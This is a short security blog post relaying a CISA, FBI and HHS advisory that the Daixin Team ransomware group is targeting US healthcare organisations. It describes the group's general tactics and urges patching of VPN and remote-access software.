Project Hyphae

Healthcare Sector Being Actively Targeted by Daixin Team Ransomware

Share This Post

Note: FRSecure is aware of a malware named Daxin. It appears that Daixin and Daxin are related, and the name differences are due to “Daxin” being used in some ransom notes.

In conjunction with the Federal Bureau of Investigation (FBI) and the Department of Health and Human Services (HHS), the Cybersecurity and Infrastructure Security Agency (CISA) today advised that the Daixin Team is actively targeting US businesses, particularly in the Healthcare and Public Health Sector (HPH).

The Daixin Team is a data extortion and ransomware group that has been targeting the HPH Sector since at least June 2022. Servers with personally identifiable information (PII) and protected health information (PHI) are highly sought after targets, and such information has been threatened to be released if ransoms are not paid. Daixin Team threat actors are typically gaining initial access to victims’ networks through VPN servers, and then move laterally with SSH and remote desktop, according to the advisory. The ransomware is based on leaked Babuk Locker source code, and used Rclone for data exfiltration in at least one confirmed compromise.

CISA is urging organizations to prioritize patching VPN servers, remote access software, virtual machine software, and known exploited vulnerabilities.

To see the full advisory, along with known Indicators of Compromise (IOCs) at this time, visit:

More To Explore

Information Security News 11-28-2022

Know Thy Enemy: Thinking Like a Hacker can Boost Cybersecurity Strategy Article Link: 90% of Organizations Have Microsoft 365 Security Gaps Article Link:

Information Security News 11-21-2022

Transportation Sector Targeted by Both Ransomware and APTs Article Link: Misconfigurations, Vulnerabilities Found in 95% of Applications Article Link: Electronics Repair Technicians Snoop

Do You Want to Shore Up Your Defenses?

We're opening our first round of threat hunting engagements to 100 organizations. Sign up or join the wait list here.